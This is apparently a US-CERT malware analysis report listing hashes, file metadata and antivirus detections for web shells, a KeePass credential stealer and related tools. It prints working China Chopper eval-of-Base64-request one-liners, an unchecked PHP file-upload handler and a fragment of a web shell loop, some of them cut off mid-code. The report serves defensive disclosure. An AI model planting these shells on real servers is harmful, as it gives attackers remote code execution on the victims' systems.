MAR-10297887.r1.v1
Malware Characterization
This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.
US-CERT
2020-09-14T10:21:43-04:00
BMachine
134
7.1.0
httpgetbin_encoded.vbs
415
ASCII text, with CRLF line terminators
MD5
876f28cbcd4711f0a95b44708d56ce70
SHA1
108bc87632304769aac05609434563448b403e2d
SHA256
40d54609acb3f1024ea91b79ca12ecf855e24ebb46d48db86a7bf34edb91b2db
SHA512
2a6ecf1a5bd8c6d396edd48ff2da32e9beaa578289c8ea3578a6d0b0c6a2c31ca945d156ad0a95a37b56405c6493c3dff8f14ff505fd662b1f98372c0d05b100
SSDEEP
12:KwAJFfyTpHkCGHjBHTeSCqFaKLVe4BURBL1LvxTVTpcqPv:KwAHfAmPDZTeSCqFaKLpubLv1hpcqPv
5.087384
<%try
{
eval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(Request.Item["[Redacted]"])),"unsafe");
}
catch(e)
{
}
—End JavaScript Code—
Analysis indicates this file might serve as part of a larger application. The code within the file decodes and executes data using the JavaScript "eval" function. The data is obtained via the JavaScript "Request" function, indicating the data is pulled from a remote server using the HTTP protocol. It is believed this script is a component of the China Chopper web shell framework.
ui-bg.aspx
178
ASCII text, with no line terminators
MD5
d7b7a8c120b69166643ee05bf70b37e5
SHA1
2ac99374cab70f8be83c48bbf3258eae78676f65
SHA256
553f355f62c4419b808e078f3f71f401f187a9ac496b785e81fbf087e02dc13f
SHA512
8c51c9e3d3d39ec7b961482ed7fc8cde1804ef126b72fce270c6891f64f4371067a65a8be1cbab1ab3c8860a3e2ea206d274f064d54cf2605ffd7eac51fa0515
SSDEEP
3:aEwJkW9uck1SLxAdRLgyKBM2aBZBQ/tZ/LmKABXXKF2xKYA5eRtGnKRHBIwLWEDp:aEm7EnLgyKBM5Y/tZ6KCHKF2xKt5e/GY
5.196436
<%try
{
eval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(Request.Item["ammashnist"])),"unsafe");
}
catch(e)
{
}
—End Embedded JavaScript—
This script is designed to pull JavaScript from an existing "Request Object", Base64-decode it, and execute it. The contents of the retrieved JavaScript code were not available for analysis. It is believed this web shell is a component of the China Chopper web shell framework.
site.aspx
178
ASCII text, with no line terminators
MD5
20d89fa1df155632fafb2c9fe1a6a038
SHA1
c9cf494475de81dae5a2c54c678b4a518f46b1fe
SHA256
134ef25d48b8873514f84a0922ec9d835890bda16cc7648372e014c1f90a4e13
SHA512
c1d485e34153c50af79e719c4100b988ba4d289578d385d0b30d2225c20b4b8f715d215f609a141030489a337ff36a89b23d4e99bf1895466122fde97e1214f0
SSDEEP
3:aEwJkW9uck1SLxAdRLgyKBM2aBZBQ/tZ/LmKABXXKF2xKYA5eRtJIIDYbwLWEDvR:aEm7EnLgyKBM5Y/tZ6KCHKF2xKt5e/f3
5.201321
—End Data—
vti_cnf.aspx.33154034.compiled
408
XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
MD5
de1cd1c54711544508d157214323af85
SHA1
c33a07965e06280c53e19a5d093983205433843f
SHA256
17f5b6d74759620f14902a5cc8bba8753df8a17da33f4ea126b98c7e2427e79c
SHA512
8265901a684f808c612f9cfcc486aaba923e2cf8ca7fdcd3071e786ad6030c067c4147b7b4e36bb271a5f2b36e0c3f487ceb259e2f00e6afd907ecb6df111a7a
SSDEEP
12:MMHdWFV2q6sX1rMxA0UH17I2fUQ/1OifV2q6sW6/1:JdmsvkrGOnfUcBsve/1
5.120655
App_Web_tcnma5bs.0.js
8401
UTF-8 Unicode (with BOM) text, with CRLF line terminators
MD5
8495abfd7356f75ad7006d2ab42d4bee
SHA1
3736a085f9fe515dc7d12bbf2a1474bdd3d8d4d2
SHA256
5e0457815554574ea74b8973fc6290bd1344aac06c1318606ea4650c21081f0a
SHA512
8c5fec8455ad0d529030f19626b8fe55b05f6f24b4fee1378e2d6ffa7185c5f2854074cfc30518721892f39985dc5742e81f875d5469101967a62fdc26d1cb36
SSDEEP
192:VkjEVXTaaVEDAQpovRpY0NHMdWoEsxpKL:VkjEVXTaaEDAQM3NHMdJEIp4
5.246768
App_Web_tcnma5bs.dll
13312
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5
18f2cf11b940a62d63fd757e20564ec6
SHA1
6fbd38aff374974c59ccca7efd8e1a3205c69ce9
SHA256
99344d862e9de0210f4056bdf4b8045ab9eabe1a62464d6513ed16208ab068fc
SHA512
190c3cb0a09ce111135d0a98d10922650c28eb895583d98b2015b67e71a2131f824863cb4402d7627648aa0660ad5eaab63ed7cae8a9a54646d09340b71019d7
SSDEEP
384:4PojaxtaTXMzS/X44tIItLzxqIj3tccsJY5Ohmqw/4JHuNkLpe+k:4PojaxyXM+/X44K2
Microsoft Visual C# v7.0 / Basic .NET
5.14385
4
2020-06-07 06:21:21-04:00
512
MD5
83b4ba5ffed3f61f2c3c07cbfb9e4645
2.606561
0.0.0.0
App_Web_tcnma5bs.dll
App_Web_tcnma5bs.dll
.text
11264
5.517535
MD5
9f9a21c74d71b03386ee22a566a1170d
.rsrc
1024
2.512896
MD5
cb5b712bb6ddf459a6a953c98373b5f6
.reloc
512
0.081539
MD5
dbd0e57bcdedc0733290c5195a01ad35
Related_To
App_Web_tcnma5bs.pdb
24064
MSVC program database ver 7.00, 512*47 bytes
MD5
3be9b7030389ad5e106f169fbe7b7458
SHA1
224448b5840b71ca07c144d3f525b8971c17d4a7
SHA256
28bc161df8406a6acf4b052a986e29ad1f60cbb19983fc17931983261b18d4ea
SHA512
bf8b7bc82be4803099cfe956edb2699c441705955e4d7e3822501940a8e572dafcf1906c797cea8551f3407059bad03c9196bd1432038c095f131bf88bd64bbc
SSDEEP
384:ihIBU3Xo3Z3oTTi3aljxTi3aljKITi3aljs8Ti3aljUTi3aljBTi3alj1Ti3aljb:ihIBU4Zox1fLOx5H1bX0b6UW
3.924351
Related_To
svchost.exe
10532864
PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
MD5
c8bc262d7126c3399baaec3bee89d542
SHA1
c94a0f902b3b8cc4ca5e4cc9004ac9eaa4614699
SHA256
55b9264bc1f665acd94d922dd13522f48f2c88b02b587e50d5665b72855aa71c
SHA512
cf7b89d9658e618cb4f590b13bd6a6e5abcba0cddca625c7aeaaafb5ef8821a7a60620b789de4abd5d4505ffe3e9c13ad3bf1173f21e1735df5103f06f7270a9
SSDEEP
196608:3YHvhq3/BuNnKkOeXtqugiGk9FPHxgc/uA63+w0IUX:kQBuVku1G+
6.107183
6
1969-12-31 19:00:00-05:00
1536
MD5
86ff3a53ecd56eaa856f8c7c28d0a8f1
1.263684
.text
4546560
5.826487
MD5
26ef590b60778bfdd9bfcbb24d832f94
.rdata
5612032
5.660454
MD5
abdb24e1a410aa5fba49a4d1fe6a21bb
.data
370688
6.023192
MD5
2e993dbff4bcb21d52aa1897a4e2604e
.idata
1536
3.442601
MD5
f006061c21d3eee457ffe5e2c69cba8e
.symtab
512
0.020393
MD5
07b5472d347d42780469fb2654b7fc54
dllhost.dll
226
ASCII text, with CRLF line terminators
MD5
14df2e509b6ee8deb3ce6ba3b88e3de0
SHA1
80190bdddf70a79a1735136f81309219c937458d
SHA256
f7ddf2651faf81d2d5fe699f81315bb2cf72bb14d74a1c891424c6afad544bde
SHA512
6a32f2715d554c11eb0a50e39540c9e68bbb387b8a3aa1dfe4604ce6ed22a075fae0c1b3dfd07468746f4d782b1bff203f9036acaff9d6bbd2ab4c0c23b58d08
SSDEEP
6:eBh3BnEWovv5O4WaundbHAVSVDOUqxTWi:enlcO4WhcSVHqxii
5.081345
kee.ps1
357631
awk or perl script, ASCII text, with very long lines
MD5
3a83cad860a688e1f40683142280a67b
SHA1
d8ad2de372296501c3eb3aa0e053708eb3914113
SHA256
913ee2b048093162ff54dca050024f07200cdeaf13ffd56c449acb9e6d5fbda0
SHA512
a7afad9c446e55e25ec6289595ebeba469df0ccbc1863c437acf64e63c13b497699804de5248664d5cb78c527ffb9d1415c36a182d32002019cba2e461bb88c3
SSDEEP
6144:SJU/ny0KiejKvsM7fz0QVd/eHuwF1U1zDtyftQQKasiaUKGY4RpmOHYqmqEqJ7jO:sIyCVjz0QpcU9QlTsZb
6.018326
Related_To
KeeTheft.dll
738304
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5
dc8a91125f273090cd8d76e9e588a074
SHA1
3455ecca61a280a1056adb69077e0c652daa3516
SHA256
10836bda2d6a10791eb9541ad9ef1cb608aa9905766c28037950664cd64c6334
SHA512
dc25e2ff93871edeb751e99cafe0717163817bfa85bd41c941c1c8b1b5ad2c63b9935060475b65dda69edce358f2759160ce94ad663c041bd41dbbd48e464cb4
SSDEEP
12288:NxOU+wucIYOW1ENXKUEHI7apPYEMMIjS3K9TodHNSIIcOECQ:NETcIYOWCNXKUEHI7apPYEMJ9TgHDpC
6.023616
4
2016-07-11 14:54:24-04:00
512
MD5
cb77191ad61291924938362fbb902f32
2.783814
KeeTheft
1.0.0.0
KeeTheft.exe
Copyright © 2016
KeeTheft.exe
KeeTheft
1.0.0.0
.text
735744
6.030226
MD5
1fb4a5b09d9141362ed994c8a99b3cf5
.rsrc
1536
4.076679
MD5
2801de31bb6a6306f169ef81e5589521
.reloc
512
0.10191
MD5
ecf88595c12869be20d521f1934da506
Characterized_By
Related_To
Figure 1
Figure 2
Figure 3
Figure 4
0)
{
echo "Error: " . $_FILES["file"]["error"] . "
";
}
else
{
echo "FILENAME: " . $_FILES["file"]["name"] . "
";
echo "FILETYPE: " . $_FILES["file"]["type"] . "
";
echo "FILETYPE: " . ($_FILES["file"]["size"] / 1024) . " kB
";
echo "FILETEMPPATH: " . $_FILES["file"]["tmp_name"] . "
";
move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
}
?>
df5bd34799e200951fcce77c1c0b42af.php
585
PHP script, ASCII text
MD5
b3b1dea400464ab5dd55e44766357957
SHA1
507a04d3faed99cee089da042913d63f1813fc2a
SHA256
51e9cadeab1b33260c4ccb2c63f5860a77dd58541d7fb0840ad52d0a1abedd21
SHA512
f7c21a4171942edd7e0d4ab7c0b3a3a1666a3dbbed14da6af4ae3c41c7607301c0c3bc83782e22c47fe40b5297a9c1374d645d04ce3b22cebf5a54d2d92ed5bb
SSDEEP
12:yDsNaficuJwHCaBzVBbgKOBUbC3c2vaveaXivglQEyKzbShL:4sCicuJwiaRVVeubCs+ieaXiY1HShL
5.136531
<%try {eval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(Request.Item["[Redacted]"])),"unsafe"); } catch(e) {}%>
—End Extracted JavaScript—
df5bd34799e200951fcce77c1c0b42af_y.php
28
PHP script, ASCII text
MD5
e11f9350ced37173d1e957ffe7d659b9
SHA1
ec6d63fd5695c470bc3daea500b270eca85e81f4
SHA256
547440bd037a149ac7ac58bc5aaa65d079537e7a87dc93bb92edf0de7648761c
SHA512
ecd2ae19d5b3264821a1d88a265973b32724d2fc85b4225a23d4bc0c1aad6e8280a78de1f9024a19461a1c1b9209222eb51cb57f980c11a862eb78c82d29a7e1
SSDEEP
3:3/a4nL:ycL
4.521641
df5bd34799e200951fcce77c1c0b42af_z.php
30
PHP script, ASCII text
MD5
8f9567ca566ab5f79081d5d17c79ee41
SHA1
01c3da91407c43d9edee751bbd2e30e081165fdc
SHA256
b443032aa281440017d1dcc3ae0a70d1d30d4f2f2b3f064f95f285e243559249
SHA512
45ba8f2dac9cf0982937feb42dd6a782e84a76fae84d8168d170e52908bc40033a7fab58395c4247093af3b3cb38532563aac00a153641420b95dabb91976e99
SSDEEP
3:3/MJHo6:0JI6
4.640224
prev_sh
872
Rich Text Format data, version 1, ANSI
MD5
ac07005f06ac63e5b1b0c1cd15a7a060
SHA1
74fe38fb9b63e3d1ff112567d770aef118a31195
SHA256
2944ea7d0045a1d64f3584e5803cbf3a026bd0e22bdf2e4ba1d28c6ad9e57849
SHA512
f2560ae09815a3011086ec1ecbdfb0102d1063dcb64a81cfb4f0d18307f0851c6f4738103024e172adb71f14982c5edcc88592f9e03f04605f8a2f86948050ba
SSDEEP
24:EnAWZJMOvOIBCotIYZa/UKt0K7uxuOv69p:EnAWZOkOm7tIYZa/UbjUkep
5.3867
—End File Data—
As illustrated within this data, the POST parameter utilized to deliver data to the script block is expected to be "citrix@[Redacted]". It is believed this script is related to the Tiny web shell.
tiny_webshell
402
Rich Text Format data, version 1, ANSI
MD5
82e6e545c9863ed9f0df1e78d2457d13
SHA1
fdc411014e747715a2d6de93723865ac5134b600
SHA256
b36288233531f7ac2e472a689ff99cb0f2ac8cba1b6ea975a9a80c1aa7f6a02a
SHA512
cbe7374679872f635564b6da357b806ffd11f86881ea9fe9286682a73e49b152b88b01c9f6c872fb3ac04044b5d2955c92b03793877e6ecbc19d775707f28824
SSDEEP
6:L4vrWK+dSQSm+BhYrJDeSykilDo5WZuXP7SX8R6H4cYzat7qq4+u13HfEW2A6xQ0:HKUSmsY+1AWZuDSXA6/YXF3M/Qq3
5.136055
30) {
$continue = false;
_log("Max inactivity time exceeded");
break;
}
// _log(stream_get_contents($pipes[1]));
// next round
if ($ss === 0) continue;
if ($ss === false) {
_log("\nServer shutting down");
$continue = false;
break;
}
if ($ss < 1) {
_log("\nNothing to do");
continue;
}
—End Extracted Code—
Figures 5 and 6 contain similar code from the open source Chunky Tuna web shell.
content
5599
PHP script, ASCII text
MD5
ce868f9ed3ebd9036456da37749ab7b9
SHA1
6099d6e21fd81c2fb85e9b157f64d2cad8fec310
SHA256
8c9aeedeea37ee88c84b170d9cd6c6d83581e3a57671be0ba19f2c8a17bd29f3
SHA512
e69966437bb4c3a819a425c6d8197fe8b7a01d2396eaa9d8f88312834e85eba8bb53f36aceefe306cbc3affe6e843afc2a833d89f02a5e7392dd31140f07b701
SSDEEP
96:NqNB3EXRKYIkbu0J5vmkI0K1sZMHXN+XNyBa9M6XN2XN7Emf+qsTMUoPk4xe0tM9:O3EhFIcT+sKSZMdMyBCMQk7d5I4xptM9
5.298102
Characterized_By
Figure 5
Figure 6
content
365
PHP script, ASCII text, with CRLF line terminators
MD5
750b1bf7269ffc5860166efa8af6b34e
SHA1
f4d152a700d93703592dc3652ff7b52ef00b4f7e
SHA256
3b14d5eafcdb9e90326cb4146979706c85a58be3fc4706779f0ae8d744d9e63c
SHA512
fcae4efb50a6e72363edfd822939ff9204ca2368963ad825e5c8b5a256255e93bc8f556cd91aa4629c53a117892e03d95aad9c4716ded27300b4d68aabd3bb4e
SSDEEP
6:99YpbSYDFYE9LO3b6bLAztLUJD/9RH80Ab6bLAztLUJOdLGX80Ab6bLAztLUJI5t:96RSurpOryLAztQ7H0WLAztzGX0WLAz/
5.142417
content
57
PHP script, ASCII text, with no line terminators
MD5
fd6c1e1fbe93a6c1ae97da3ddc3a381f
SHA1
a5225159267538863f8625050de94d880d54d2d4
SHA256
4a1fc30ffeee48f213e256fa7bff77d8abd8acd81e3b2eb3b9c40bd3e2b04756
SHA512
ea392b3dd9c323ae5e41d68394a56bb13914e9311f2d98648c9b5560af3bb9f85b4ac4d5a947bce5658fa230b3902fb574e5247c626643150dd8b6087f782ec1
SSDEEP
3:E1uWATR7cNT2xrXMnFNXC4/:EEW2A6xQnqO
4.922815
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
d7b7a8c120b69166643ee05bf70b37e5
SHA1
2ac99374cab70f8be83c48bbf3258eae78676f65
SHA256
553f355f62c4419b808e078f3f71f401f187a9ac496b785e81fbf087e02dc13f
NCCIC
2020-09-14T14:52:21+00:00
MAEC Characterization of d7b7a8c120b69166643ee05bf70b37e5
Symantec
Hacktool.Jsprat
Sophos
Troj/WebShel-F
ESET
ASP/Webshell.T trojan
trojan
webshell
MAEC Characterization of 20d89fa1df155632fafb2c9fe1a6a038
Symantec
Hacktool.Jsprat
Sophos
Troj/WebShel-F
ESET
ASP/Webshell.T trojan
MAEC Characterization of c8bc262d7126c3399baaec3bee89d542
K7
Riskware ( 0040eff71 )
Sophos
App/FRProxy-A
MAEC Characterization of 3a83cad860a688e1f40683142280a67b
Cyren
Trojan.NBMZ-8
BitDefender
Application.Hacktool.TJ
ESET
MSIL/PSW.KeeThief.A trojan
Ikarus
Trojan.PowerShell.Pklotide
MAEC Characterization of dc8a91125f273090cd8d76e9e588a074
McAfee
GenericRXIL-CE!DC8A91125F27
K7
Password-Stealer ( 005253fd1 )
Symantec
Trojan.Gen.MBT
BitDefender
Gen:Variant.Ursu.299323
Microsoft Security Essentials
PWS:MSIL/KeeThief
Emsisoft
Gen:Variant.Ursu.299323 (B)
Avira
TR/PSW.KeeThief.vmqvn
Ahnlab
Trojan/Win32.Tiggre
ESET
a variant of MSIL/PSW.KeeThief.A trojan
Ikarus
Trojan.MSIL.PSW
MAEC Characterization of e11f9350ced37173d1e957ffe7d659b9
Microsoft Security Essentials
Backdoor:PHP/Dirtelti.MTG
ESET
PHP/WebShell.NGI trojan
backdoor
MAEC Characterization of 8f9567ca566ab5f79081d5d17c79ee41
Microsoft Security Essentials
Backdoor:PHP/Dirtelti.MTG
MAEC Characterization of 82e6e545c9863ed9f0df1e78d2457d13
Microsoft Security Essentials
Backdoor:PHP/Chopper.C!dha
ESET
PHP/WebShell.NBV trojan
remote-access-trojan
MAEC Characterization of fd6c1e1fbe93a6c1ae97da3ddc3a381f
Microsoft Security Essentials
Backdoor:PHP/Dirtelti.MTF
ESET
PHP/WebShell.NBV trojan
NANOAV
Trojan.Html.Backdoor.fqkken
10297887.r1.v1
Malicious Code
Malicious Artifact Detected